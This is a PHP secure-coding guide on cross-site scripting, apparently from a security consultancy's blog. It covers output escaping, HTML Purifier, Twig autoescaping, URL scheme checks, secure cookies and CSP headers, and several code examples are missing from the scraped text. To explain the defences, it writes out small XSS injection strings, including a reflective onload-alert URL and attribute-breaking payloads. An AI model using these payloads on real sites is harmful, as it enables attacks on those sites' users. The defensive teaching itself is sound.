**Cross-Site Scripting** (abbreviated as XSS) is a class of security vulnerability whereby an attacker manages to use a website to deliver a potentially malicious JavaScript payload to an end user. XSS vulnerabilities are *very* common in web applications. They're a special case of code injection attack; except where SQL injection, local/remote file inclusion, and OS command injection target the server, XSS exclusively targets the users of a website. There are two main varieties of XSS vulnerabilities we need to consider when planning our defenses: * **Stored XSS** occurs when data you submit to a website is persisted (on disk or in RAM) across requests, usually with the goal of executing when a privileged user access a particular web page. * **Reflective XSS** occurs when a particular page can be used to execute arbitrary code, but it does not persist the attack code across multiple requests. Since an attacker needs to send a user to a specially crafted URL for the code to run, reflective XSS usually requires some social engineering to pull off. Cross-Site Scripting vulnerabilities can be used by an attacker to accomplish a long list of potential nefarious goals, including: * Steal your [session identifier](https://paragonie.com/blog/2015/04/fast-track-safe-and-secure-php-sessions) so they can impersonate you and access the web application. * Redirect you to a phishing page that gathers sensitive information. * Install malware on your computer (usually requires a 0day vulnerability for your browser and OS). * Perform tasks on your behalf (i.e. create a new administrator account with the attacker's credentials). Cross-Site Scripting represents an asymmetric in the security landscape. They're incredibly easy for attackers to exploit, but XSS mitigation can become a rabbit hole of complexity depending on your project's requirements. # Brief XSS Mitigation Guide 1. If your framework has a templating engine that offers automatic contextual filtering, use that. Make sure you use the appropriate context flags (e.g. `url`, `html_attr`, `html`). **Context matters to XSS prevention.** 2. `echo htmlentities($string, ENT_QUOTES | ENT_HTML5, 'UTF-8');` is a safe and effective way to stop all XSS attacks on a UTF-8 encoded web page, but doesn't allow any HTML. 3. If your requirements allow you to use e.g. Markdown instead of HTML, then [don't use HTML](#avoid-html). 4. If you need to allow some HTML and aren't using a templating engine (see #1), use [HTML Purifier](http://htmlpurifier.org). 5. For user-provided URLs, you additionally want to only allow `http:` and `https:` schemes; never `javascript:`. Furthermore, URL encode any user input. The rest of this document explains cross-site scripting vulnerabilities and their mitigation strategies in detail. ## What Does a XSS Vulnerability Look Like? XSS vulnerabilities can occur in any place where information which can be altered by any user is included in the output of a webpage without being properly escaped. ### Example 1
This is a potential **stored XSS** infection point (assuming the `profile` field was pulled straight from the database without escaping). If the malicious user is able to include a snippet that looks like this, they can exploit any authenticated user that visits their profile and steal their cookies for future impersonation efforts: ### Example 2
The above snippet is vulnerable to **reflective XSS** attacks. Just trick a user into visiting `/form.php?%22%20onload%3D%22alert(%27XSS%27)%3B` and they will see an alert box pop up containing the message 'XSS' when your page loads. --------- Unlike [SQL Injection](https://paragonie.com/blog/2015/05/preventing-sql-injection-in-php-applications-easy-and-definitive-guide), which prepared statements defeat 100% of the time, cross-site scripting doesn't have an industry standard strategy for separating data from instructions. You have to escape special characters to prevent attacks. ## The Quick and Dirty XSS Mitigation Technique for PHP Applications The simplest and most effective way to prevent XSS attacks is the nuclear option: **Ruthlessly escape any character that can affect the structure of your document.** For best results, you want to use the built-in `htmlentities()` function that PHP offers instead of playing with string escaping yourself. ', $articleTitle, '', "\n"; echo noHTML($some_data), "\n"; The security of this construction depends on the presence of the `ENT_QUOTES` flag when to escape HTML attribute values. It's important to note that this prevents *any HTML characters* in `$some_data` from displaying on the web page. ### Why `ENT_QUOTES | ENT_HTML5` and `'UTF-8'`? We specify `ENT_QUOTES` to tell `htmlentities()` to escape quote characters (`"` and `'`). This is helpful for situations such as: If you failed to specify `ENT_QUOTES` and attacker simply needs to pass `" onload="malicious javascript code` as a value to that form field and presto, instant client-side code execution. We specify `ENT_HTML5` and `'UTF-8'` so `htmlentities()` knows what character set and version of the HTML standard to work with. The reason we need to specify both values is, as [demonstrated against `mysql_real_escape_string()`](http://stackoverflow.com/a/12118602/2224584), an incorrect (especially attacker-controlled) character encoding can defeat string-based escaping strategies. For the sake of safety and consistency, the encoding we specify here, the encoding sent in the `charset` attribute of the `` tag, and the `charset` added to the `Content-Type` HTTP header should all match.

Important - Avoid Premature Optimization

**Always escape data on output (when displaying to a user)**. Do not escape user input against XSS attacks before inserting into a database. WordPress made this mistake and eventually security researcher Jouko Pynnönen of Klikki Oy realized [MySQL column truncation can defeat before-insert XSS prevention strategies](https://klikki.fi/adv/wordpress2.html). You should still be **validating your input**, however. If you're expecting an email address, make sure it's formatted like one. $email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL); if ($email === false) { // Not a valid email address! Handle this invalid input here. } If you're using MySQL, make sure any values going into a `TEXT` field will fit in less than 64 KiB. MySQL will truncate `TEXT` fields if any value exceeds that length, which can cause both security issues (as WordPress experienced) as well as data integrity issues. -------------------- The "escape all HTML entities" approach is secure and works wonderfully for situations where users should not be providing their own HTML markup. But what if you need to allow *some* markup, while not opening the door for *any* markup? Put another way: How can we allow users to provide their own rich text markup without allowing them to execute arbitrary JavaScript in visitors' browsers?

Avoid HTML If You Can

An attractive solution is to adopt a rendering format such as BBCode, Markdown, or ReStructuredText instead of allowing raw HTML. This allows us to continue to reject all HTML entities while still allowing a limited subset markup options to make a user's contributions more expressive and powerful. **If you can avoid accepting raw HTML** by using another markup language such as Markdown, **please do so.** If you can bolt a [WYSIWYG](https://github.com/sofish/pen#readme) onto it for non-technical users, even better. This means doing the following: 1. Escape **ALL** HTML first, so arbitrary HTML is not passed to the renderer. 2. Render the output of step 1. For example:
<?php
declare(strict_types=1);
namespace Foo\Bar;

use League\CommonMark\CommonMarkConverter;

class ExampleRenderer
{
    /** @var CommonMarkConverter $markdown */
    protected $markdown;

    public function __construct(CommonMarkConverter $markdown)
    {
        $this->markdown = $markdown;
    }

    /**
     * Escape HTML, then pass to the Markdown renderer.
     *
     * @param string $input
     * @return string
     */
    public function renderUserInput(string $input): string
    {
        return $this->markdown->convertToHtml(self::noHTML($input));
    }

    /**
     * Escape all HTML, JavaScript, and CSS
     * 
     * @param string $input The input string
     * @param string $encoding Which character encoding are we using?
     * @return string
     */
    public static function noHTML(string $input, string $encoding = 'UTF-8'): string
    {
        return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding);
    }
}
Note, however, that your output will in most cases still be HTML, so don't stop reading here. ## An Order of HTML Please, Hold the XSS Payload Although we can easily stop all XSS attacks by preventing any HTML markup characters from breaking the document structure, this is often not the desired outcome. For some use cases (blog comments, user profiles, etc.) we want to allow our end users to be free to express themselves, within reason. But at the same time, we don't want users to be able to abuse this potential for customization to attack other users. How can we resolve this conflict? Simple: Use a library such as **[HTML Purifier](http://htmlpurifier.org).** Most of the [clever XSS tricks](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet) hidden in the HTML specification are easily [defeated by HTMLPurifier](http://htmlpurifier.org/live/smoketests/xssAttacks.php), if used correctly. ### How to Use HTMLPurifier to Stop XSS Attacks Instead of attempting to naively search and replace malicious snippets in a string of user input, HTML Purifier digests the entire string as an HTML document, breaks it into tokens, and validates all elements and attributes against a whitelist and the RFC definitions for each attribute.
purify($user['profile']); ?>
### Optimizing HTMLPurifier Running HTML Purifier on every page load is a performance concern that can be easily fixed by caching. When you insert data into your database, keep the original values intact (e.g. for logging and threat intelligence purposes), but also store a purified version and use the purified HTML when displaying to end users. This "store, purify, cache, serve from cache" strategy allows you to enjoy the performance benefits developers normally get from filtering on input, but without causing a permanent loss of data. It also allows you to re-purify your original values in the event that you need to (e.g. if HTML Purifier has a bug with HTML5 output and they release a new version that fixes it). $db->insert('blog_comments', [ /* Other fields */ 'original_body' => $_POST['body'], 'rendered_body' => $htmlp->purify($_POST['body']) ]); ### **Important:** When Not to Use HTML Purifier HTML Purifier expects to operate in the context of an HTML document, not a string within an HTML attribute. The library isn't psychic. It cannot tell what the rest of the web page is doing immediately before and after the string you invoke it on an untrusted string. For example, even though it's using HTML Purifier, the following snippet is still **insecure**: Simply pass the string `" onload="alert('XSS');` to `username` and you have client-side code execution. When inserting any variables into another context, you should also run them through `htmlspecialchars()` (or `noHTML()` above) to ensure they don't break out and add extra attributes to the parent element. This is safe: This, too, is safe against XSS attacks, but still a *bad idea*: purify(""); ?> As it turns out, **context matters a lot for preventing cross-site scripting attacks**. What's secure in one context (e.g. HTML is allowed) could be disastrous in other contexts (e.g. we're in the middle of an HTML attribute). ### What About Other Contexts? We've uncovered two rules for preventing XSS attacks so far: 1. Always escape all HTML entities (i.e. with `noHTML()` defined above) when inserting data to an HTML attribute. 2. Always purify (i.e. with HTML Purifier) when you wish to allow safe HTML from the input string to appear in the rendered web page. What do we do if we want to add a user-provided parameter to a `style` tag or attribute? What if we want to define a default value to a JavaScript variable? What about hyperlinks? ## Context-Sensitive HTML Escaping in Template Engines Every context within an HTML document requires distinct escaping rules that are not always relevant to other contexts. Fortunately, there's an easy way to tackle all this complexity without a great deal of effort or research: **Use templating libraries.** A popular PHP templating engine, [Twig](http://twig.sensiolabs.org), makes [contextual XSS filtering](http://twig.sensiolabs.org/doc/filters/escape.html) a walk in the park: {% autoescape 'css' %}

Test

{% endautoescape %} {% autoescape 'html' %} {{ some_var }} {{ not_user_provided|raw }}

{{ username }}

{% endautoescape %} If you're using Twig, you should prefer wrapping entire sections in `{% autoescape %}` blocks above applying `|e` filters to every printed template variable. Not only does auto-escaping make your code easier to read, but it prevents a single oversight from becoming an entry point for an attacker with a malicious payload. ### What If I Cannot Use a Templating Engine? Then you're doomed to reinvent the wheel, possibly insecurely. * Strip HTML where ever you don't absolutely need to allow it. * Use something like HTMLPurifier to prevent XSS when rich content is required, even if there's [an intermediary step (e.g. a Markdown renderer)](#avoid-html) in the midst.

Safely Handling Hyperlinks Without a Templating Engine

If you need to accept arbitrary URLs from your users, and you aren't using a templating engine that supports context-aware URL escaping, apply the following rules: 1. Only allow `https:` URI schemes. Possibly `http:`. Never `javascript:`. 2. URL-encode any user input before stripping HTML. For example:
<?php
declare(strict_types=1);
namespace Foo\Bar;

class UserProvidedLinks
{
    /** @var array $allowedSchemes */
    protected $allowedSchemes = [];

    public function __construct(array $allowedSchemes = ['https'])
    {
        $this->allowedSchemes = $allowedSchemes;
    }

    /**
     * Only allow valid schemes
     *
     * @param string $url
     * @return string
     */
    public function validateUrl(string $url): string
    {
        $parsed = parse_url($url);
        if (!\is_array($parsed)) {
            return '#';
        }
        if (!\in_array($parsed['scheme'], $this->allowedSchemes, true)) {
            return '#';
        }
        return $url;
    }
}
Usage:
<?php

$filter = new Foo\Bar\UserProvidedLinks([
    'http',
    'https'
]);

// Full URL provided by user
echo '<a href="', noHTML(
        $filter->validateUrl($userProvidedLink)
    ), '">', noHTML($userProvidedLabel), '</a>', PHP_EOL;

// Partial URL provided by user:
echo '<a href="https://example.com/page/', 
        noHTML(urlencode($page)),
    '">', noHTML($label), '</a>', PHP_EOL;
    
## Browser-Level XSS Mitigation There are a number of security features supported by all modern web browsers that significantly reduce the impact of XSS vulnerabilities. Even if you manage to escape every variable you output, it would be a very good idea to use these features. We are going to focus on two: **HTTPS-Only Cookies** (which means HTTP-Only cookies which only transmit over TLS) and **Content-Security-Policy** headers. ### Secure Cookies Any time you [set a cookie in PHP](https://php.net/manual/en/function.setcookie.php), you should set both `httpOnly` and `secure` to `true`. (This assumes your website is only accessible over HTTPS, which it should be.) Your session cookie should, especially, not be made available to Javascript. This can be achieved either through adding these lines to `php.ini`, or by setting them manually on every request: session.cookie_httponly = On session.cookie_secure = On Setting the session cookie parameters on every page load: session_set_cookie_params( 0, // Lifetime -- 0 means erase when browser closes '/', // Which paths are these cookies relevant? '.yourdomain.com', // Only expose this to which domain? true, // Only send over the network when TLS is used true // Don't expose to Javascript ); session_start(); ### Content-Security-Policy headers `Content-Security-Policy` headers significantly reduce the risk and impact of XSS attacks in modern browsers by specifying a whitelist in the HTTP response headers which dictate what the HTTP response body can do. They don't protect against an attacker capable of modifying the source files on the server, but most real-world XSS vulnerabilities will fail to execute if they are used properly. An example of a CSP header looks like this: Content-Security-Policy: script-src 'self' https://ajax.googleapis.com https://www.google-analytics.com; child-src 'none'; object-src 'none'; upgrade-insecure-requests HTML5 Rocks has a great [introductory tutorial for Content-Security-Policy headers](http://www.html5rocks.com/en/tutorials/security/content-security-policy) if you would like to learn more about writing them. ### Paragon Initiative Enterprise's CSP Compiler Ever wanted to make `Content-Security-Policy` headers easier to manage? Whether you'd rather just edit a JSON file than remember the syntax of a CSP header, or if you'd rather build the headers for a particular request programmatically (e.g. to use the script-nonce feature), check out our MIT-licensed [CSP Builder](https://paragonie.com/project/csp-builder) project. ## Summary 1. Use `Content-Security-Policy` headers and HTTPS-only cookies. 2. Your first line of defense against XSS attacks should be filtering any tainted information before inserting them in the DOM **not before storing it in a database**. 3. If you can avoid accepting actual HTML by opting for Markdown, etc. then don't accept HTML. 4. If you're using a templating engine such as [Twig](http://twig.sensiolabs.org), use `{% autoescape %}` directives and `|e` filters where appropriate. `{% autoescape %}` should be prioritized over escaping every variable. 5. If you're not using a templating engine and need to safely render user-provided HTML, use [HTML Purifier](http://htmlpurifier.org). Feel free to leverage caching for optimization, but keep an intact copy on-hand. 6. Otherwise, use `noHTML()` and leave nothing to chance. 7. For hyperlinks: 1. Don't allow `javascript:` URIs, full stop. Consider whitelisting `https:`. 2. URL-encode all user input. ## External Links and Resources * [OWASP's XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet) * [OWASP's PHP Security Cheat Sheet](https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet) * [`Content-Security-Policy` Builder](https://paragonie.com/project/csp-builder) ## We Consult We are a team of [technology consultants](https://paragonie.com/service/consulting), [web developers](https://paragonie.com/service/web-development), [code reviewers](https://paragonie.com/service/code-review), and [application security specialists](https://paragonie.com/service/appsec) based in Orlando, FL. If you're concerned about the risk of cross-site scripting in your business applications, [get in touch with us today](https://paragonie.com/contact).